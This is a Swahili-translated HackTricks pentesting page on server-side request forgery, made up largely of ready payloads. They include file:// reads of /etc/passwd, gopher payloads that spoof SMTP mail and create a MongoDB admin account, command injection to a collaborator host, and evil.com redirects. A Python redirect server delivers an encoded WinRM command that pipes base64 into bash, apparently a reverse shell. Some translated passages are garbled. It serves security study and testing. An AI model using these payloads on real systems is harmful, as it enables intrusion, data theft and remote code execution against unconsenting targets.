27 KiB
SSRF (Server Side Request Forgery)
Tumia Trickest kujenga na kujiendesha kiotomatiki kazi zinazotolewa na zana za jamii za kisasa zaidi duniani.
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki hila za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Taarifa za Msingi
Ukiukaji wa Server-side Request Forgery (SSRF) hutokea wakati mshambuliaji anaposhawishi programu ya upande wa seva kufanya maombi ya HTTP kwa kikoa chochote anachochagua. Ukiukaji huu unafichua seva kwa maombi ya nje yasiyo na mipaka yanayoelekezwa na mshambuliaji.
Kamatia SSRF
Jambo la kwanza unahitaji kufanya ni kukamata mwingiliano wa SSRF ulioanzishwa na wewe. Ili kukamata mwingiliano wa HTTP au DNS unaweza kutumia zana kama:
- Burp Collaborator
- pingb
- canarytokens
- interractsh
- http://webhook.site
- https://github.com/teknogeek/ssrf-sheriff
- http://requestrepo.com/
- https://github.com/stolenusername/cowitness
- https://github.com/dwisiswant0/ngocok - Burp Collaborator inayotumia ngrok
Bypass ya Domains Zilizoorodheshwa
Kwa kawaida utaona kuwa SSRF inafanya kazi tu katika kikoa fulani kilichoorodheshwa au URL. Katika ukurasa ufuatao una mkusanyiko wa mbinu za kujaribu kupita hiyo orodha:
{% content-ref url="url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}
Kupita kupitia mwelekeo wazi
Ikiwa seva imekingwa ipasavyo unaweza kupita vizuizi vyote kwa kutumia Mwelekeo Wazi ndani ya ukurasa wa wavuti. Kwa sababu ukurasa wa wavuti utaruhusu SSRF kwa kikoa hicho hicho na labda uta fuata mwelekeo, unaweza kutumia Mwelekeo Wazi kufanya seva kufikia rasilimali yoyote ya ndani.
Soma zaidi hapa: https://portswigger.net/web-security/ssrf
Protokali
- file://
- Mpango wa URL
file://
unarejelea, ukielekeza moja kwa moja kwa/etc/passwd
:file:///etc/passwd
- dict://
- Mpango wa URL wa DICT un وصف kama unavyotumika kwa kufikia maelezo au orodha za maneno kupitia protokali ya DICT. Mfano uliopewa unaonyesha URL iliyojengwa ikilenga neno maalum, hifadhidata, na nambari ya kuingia, pamoja na mfano wa skripti ya PHP inayoweza kutumika vibaya kuungana na seva ya DICT kwa kutumia akidi zilizotolewa na mshambuliaji:
dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>
- SFTP://
- Imeainishwa kama protokali ya uhamishaji wa faili salama kupitia shell salama, mfano umepewa unaonyesha jinsi skripti ya PHP inaweza kutumika vibaya kuungana na seva ya SFTP mbaya:
url=sftp://generic.com:11111/
- TFTP://
- Protokali ya Uhamishaji wa Faili Rahisi, inayofanya kazi juu ya UDP, inatajwa na mfano wa skripti ya PHP iliyoundwa kutuma ombi kwa seva ya TFTP. Ombi la TFTP linafanywa kwa 'generic.com' kwenye bandari '12346' kwa faili 'TESTUDPPACKET':
ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
- LDAP://
- Sehemu hii inashughulikia Protokali ya Upatikanaji wa Katalogi Nyepesi, ikisisitiza matumizi yake katika kusimamia na kufikia huduma za habari za katalogi zilizogawanywa kupitia mitandao ya IP. Shirikiana na seva ya LDAP kwenye localhost:
'%0astats%0aquit' kupitia ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.
- SMTP
- Njia inaelezewa kwa kutumia udhaifu wa SSRF kuingiliana na huduma za SMTP kwenye localhost, ikiwa ni pamoja na hatua za kufichua majina ya kikoa cha ndani na hatua zaidi za uchunguzi kulingana na habari hiyo.
From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect
- Curl URL globbing - WAF bypass
- Ikiwa SSRF inatekelezwa na curl, curl ina kipengele kinachoitwa URL globbing ambacho kinaweza kuwa na manufaa katika kupita WAFs. Kwa mfano katika hii writeup unaweza kupata mfano huu wa path traversal kupitia
file
protocol:
file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
- Gopher://
- Uwezo wa itifaki ya Gopher wa kubainisha IP, bandari, na bytes kwa mawasiliano ya seva unajadiliwa, pamoja na zana kama Gopherus na remote-method-guesser kwa ajili ya kuunda payloads. Matumizi mawili tofauti yanaonyeshwa:
Gopher://
Kwa kutumia itifaki hii unaweza kubainisha IP, bandari na bytes unazotaka seva itume. Kisha, unaweza kimsingi kutumia SSRF ili kuwasiliana na seva yoyote ya TCP (lakini unahitaji kujua jinsi ya kuzungumza na huduma hiyo kwanza).
Kwa bahati nzuri, unaweza kutumia Gopherus kuunda payloads kwa huduma kadhaa. Zaidi ya hayo, remote-method-guesser inaweza kutumika kuunda gopher payloads kwa huduma za Java RMI.
Gopher smtp
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT
Gopher HTTP
#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
Gopher SMTP — Unganisha tena kwa 1337
{% code title="redirect.php" %}
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.
{% endcode %}
Gopher MongoDB -- Unda mtumiaji mwenye jina la mtumiaji=admin na nenosiri=admin123 na ruhusa=administrator
# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
7%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a
%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%
06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00
%00%00administrator%00%00%00%00'
SSRF kupitia kichwa cha Referrer & Mengineyo
Programu za uchanganuzi kwenye seva mara nyingi huandika kichwa cha Referrer ili kufuatilia viungo vinavyokuja, tabia ambayo kwa bahati mbaya inafichua programu kwa udhaifu wa Server-Side Request Forgery (SSRF). Hii ni kwa sababu programu hizo zinaweza kutembelea URL za nje zilizotajwa katika kichwa cha Referrer ili kuchambua maudhui ya tovuti za rejeleo. Ili kugundua udhaifu hizi, nyongeza ya Burp Suite "Collaborator Everywhere" inapendekezwa, ikitumia njia ambavyo zana za uchanganuzi zinavyoshughulikia kichwa cha Referer ili kubaini maeneo yanayoweza kushambuliwa kwa SSRF.
SSRF kupitia data ya SNI kutoka kwa cheti
Usanidi mbaya ambao unaweza kuwezesha muunganisho na nyuma yoyote kupitia usanidi rahisi umeonyeshwa kwa mfano wa usanidi wa Nginx:
stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}
Katika usanidi huu, thamani kutoka kwa uwanja wa Server Name Indication (SNI) inatumika moja kwa moja kama anwani ya backend. Mipangilio hii inafichua udhaifu wa Server-Side Request Forgery (SSRF), ambao unaweza kutumiwa kwa kutaja tu anwani ya IP au jina la kikoa katika uwanja wa SNI. Mfano wa matumizi ili kulazimisha muunganisho na backend isiyo ya kawaida, kama internal.host.com
, kwa kutumia amri ya openssl
unapatikana hapa chini:
openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
Wget file upload
SSRF na Command Injection
Inaweza kuwa na faida kujaribu payload kama: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`
PDFs Rendering
Ikiwa ukurasa wa wavuti unaunda kiotomatiki PDF na baadhi ya taarifa ulizotoa, unaweza kuingiza JS ambayo itatekelezwa na muundaji wa PDF mwenyewe (server) wakati wa kuunda PDF na utaweza kutumia SSRF. Pata maelezo zaidi hapa.
Kutoka SSRF hadi DoS
Unda vikao kadhaa na jaribu kupakua faili nzito ukitumia SSRF kutoka kwa vikao.
SSRF PHP Functions
Angalia ukurasa ufuatao kwa kazi za PHP zenye udhaifu na hata kazi za Wordpress:
{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %} php-ssrf.md {% endcontent-ref %}
SSRF Redirect to Gopher
Kwa baadhi ya matumizi unaweza kuhitaji kutuma jibu la kuhamasisha (inaweza kuwa kutumia protokali tofauti kama gopher). Hapa una misimbo tofauti ya python kujibu kwa kuhamasisha:
# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)
self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
self.end_headers()
httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)
@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
Tumia Trickest kujenga na kujiendesha kazi kwa urahisi zikiwa na nguvu za zana za jamii za kisasa zaidi duniani.
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
Proxies zisizo na mpangilio kwa SSRF
Hila kutoka kwenye chapisho hili.
Flask
Flask proxy vulnerable code
```python from flask import Flask from requests import getapp = Flask('main') SITE_NAME = 'https://google.com'
@app.route('/', defaults={'path': ''}) @app.route('/path:path')
def proxy(path): return get(f'{SITE_NAME}{path}').content
if name == "main": app.run(threaded=False)
</details>
Flask inaruhusu kutumia **`@`** kama herufi ya mwanzo, ambayo inaruhusu kufanya **jina la mwenyeji wa mwanzo kuwa jina la mtumiaji** na kuingiza mpya. Ombi la shambulio:
```http
GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close
Spring Boot
Msimamo wa hatari:
Iligundulika kwamba inawezekana kuanza njia ya ombi kwa herufi ;
ambayo inaruhusu kutumia kisha @
na kuingiza mwenyeji mpya ili kufikia. Ombi la shambulio:
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
PHP Built-in Web Server
Code ya PHP iliyo hatarini
```php $proxy_site = $site.$current_uri; var_dump($proxy_site);echo "\n\n";
$response = file_get_contents($proxy_site); var_dump($response); ?>
</details>
PHP inaruhusu matumizi ya **char `*` kabla ya slash katika njia** ya URL, hata hivyo, ina mipaka mingine kama vile kwamba inaweza kutumika tu kwa njia ya mzizi `/` na kwamba alama `.` haziruhusiwi kabla ya slash ya kwanza, hivyo inahitajika kutumia anwani ya IP iliyokuwa na hex bila alama kwa mfano:
```http
GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close
DNS Rebidding CORS/SOP bypass
Ikiwa unakabiliwa na matatizo ya kuondoa maudhui kutoka kwa IP ya ndani kwa sababu ya CORS/SOP, DNS Rebidding inaweza kutumika kupita kikomo hicho:
{% content-ref url="../cors-bypass.md" %} cors-bypass.md {% endcontent-ref %}
Automated DNS Rebidding
Singularity of Origin
ni chombo cha kufanya DNS rebinding mashambulizi. Inajumuisha vipengele muhimu vya kubadilisha anwani ya IP ya jina la DNS la seva ya shambulizi kwa anwani ya IP ya mashine lengwa na kutoa mzigo wa shambulizi ili kutumia programu dhaifu kwenye mashine lengwa.
Tazama pia seva inayotumika hadharani katika http://rebind.it/singularity.html
DNS Rebidding + TLS Session ID/Session ticket
Mahitaji:
- SSRF
- Sehemu za TLS za nje
- Vitu kwenye port za ndani
Shambulizi:
- Muulize mtumiaji/boti kupata domain inayodhibitiwa na mshambuliaji
- TTL ya DNS ni 0 sekunde (hivyo mwathirika atakagua IP ya domain tena hivi karibuni)
- Muunganisho wa TLS unaundwa kati ya mwathirika na domain ya mshambuliaji. Mshambuliaji anaingiza mzigo ndani ya Session ID au Session Ticket.
- Domain itaanza mzunguko usio na mwisho wa kuelekeza dhidi ya yake mwenyewe. Lengo la hili ni kumfanya mtumiaji/boti kufikia domain hadi ifanye tena ombio la DNS la domain.
- Katika ombi la DNS anwani ya IP ya kibinafsi inatolewa sasa (127.0.0.1 kwa mfano)
- Mtumiaji/boti atajaribu kuanzisha tena muunganisho wa TLS na ili kufanya hivyo atatuma Session ID/Ticket ID (ambapo mzigo wa mshambuliaji ulikuwa umejumuishwa). Hivyo hongera umefaulu kumwambia mtumiaji/boti ajishambulie mwenyewe.
Kumbuka kwamba wakati wa shambulizi hili, ikiwa unataka kushambulia localhost:11211 (memcache) unahitaji kumfanya mwathirika kuanzisha muunganisho wa awali na www.attacker.com:11211 (port lazima iwe sawa kila wakati).
Ili kufanya shambulizi hili unaweza kutumia chombo: https://github.com/jmdx/TLS-poison/
Kwa maelezo zaidi angalia mazungumzo ambapo shambulizi hili linaelezewa: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference
Blind SSRF
Tofauti kati ya SSRF kipofu na isiyo kipofu ni kwamba katika kipofu huwezi kuona jibu la ombi la SSRF. Hivyo, ni vigumu zaidi kutumia kwa sababu utaweza kutumia tu udhaifu unaojulikana vizuri.
Time based SSRF
Kuangalia muda wa majibu kutoka kwa seva inaweza kuwa inawezekana kujua ikiwa rasilimali ipo au la (labda inachukua muda zaidi kufikia rasilimali iliyopo kuliko kufikia ile isiyopo)
Cloud SSRF Exploitation
Ikiwa unapata udhaifu wa SSRF katika mashine inayofanya kazi ndani ya mazingira ya wingu unaweza kuwa na uwezo wa kupata taarifa za kuvutia kuhusu mazingira ya wingu na hata akidi:
{% content-ref url="cloud-ssrf.md" %} cloud-ssrf.md {% endcontent-ref %}
SSRF Vulnerable Platforms
Majukwaa kadhaa yanayojulikana yana au yamekuwa na udhaifu wa SSRF, angalia katika:
{% content-ref url="ssrf-vulnerable-platforms.md" %} ssrf-vulnerable-platforms.md {% endcontent-ref %}
Tools
SSRFMap
Chombo cha kugundua na kutumia udhaifu wa SSRF
Gopherus
Chombo hiki kinazalisha mzigo wa Gopher kwa:
- MySQL
- PostgreSQL
- FastCGI
- Redis
- Zabbix
- Memcache
remote-method-guesser
remote-method-guesser ni skana ya udhaifu wa Java RMI inayounga mkono operesheni za shambulizi kwa udhaifu wa kawaida wa Java RMI. Operesheni nyingi zinazopatikana zinaunga mkono chaguo --ssrf
, ili kuzalisha mzigo wa SSRF kwa operesheni iliyotakiwa. Pamoja na chaguo --gopher
, mzigo wa gopher unaweza kuzalishwa moja kwa moja.
SSRF Proxy
SSRF Proxy ni seva ya proxy ya HTTP yenye nyuzi nyingi iliyoundwa kutunza trafiki ya HTTP ya mteja kupitia seva za HTTP zilizo dhaifu kwa Server-Side Request Forgery (SSRF).
To practice
{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}
References
- https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
- https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/
- https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Tumia Trickest kujenga na kujiendesha kwa urahisi kazi zinazotumiwa na zana za jamii za kisasa zaidi duniani.
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}